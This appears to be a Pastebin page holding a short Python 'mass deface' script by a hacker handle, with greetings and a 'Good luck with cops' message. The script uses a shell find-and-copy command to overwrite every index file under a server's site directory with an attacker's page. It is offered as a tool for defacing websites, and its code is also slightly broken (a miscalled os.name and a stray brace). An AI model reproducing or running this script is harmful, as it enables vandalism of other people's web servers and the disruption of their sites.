Advertisement
Kyfx

Python Mass Deface script

Mar 21st, 2015
571
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.49 KB | None | 0 0
  1. #Mass Deface Script by ATa_HeRo #Greetz baltazar, b0ne, Toro, Melvin, Mikisoft etc. #Usage: mass.py [sitepath] [tvojindexfajl] #mass.py /home /tmp/index.php import os, sys, time print "Defaceing..." print "Just wait and see the magic..." time.sleep(1) sajtpt = sys.argv[1] indef = sys.argv[2] inf = os.name() exe = "find %s -name \"index.*\" -exec cp %s {} \;" % (sajtpt, indef) os.system(exe) print "Done..." print "Good luck with cops" print inf print "Visit Hackingsec.in" #EOF #Script by ATa_HeRo }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement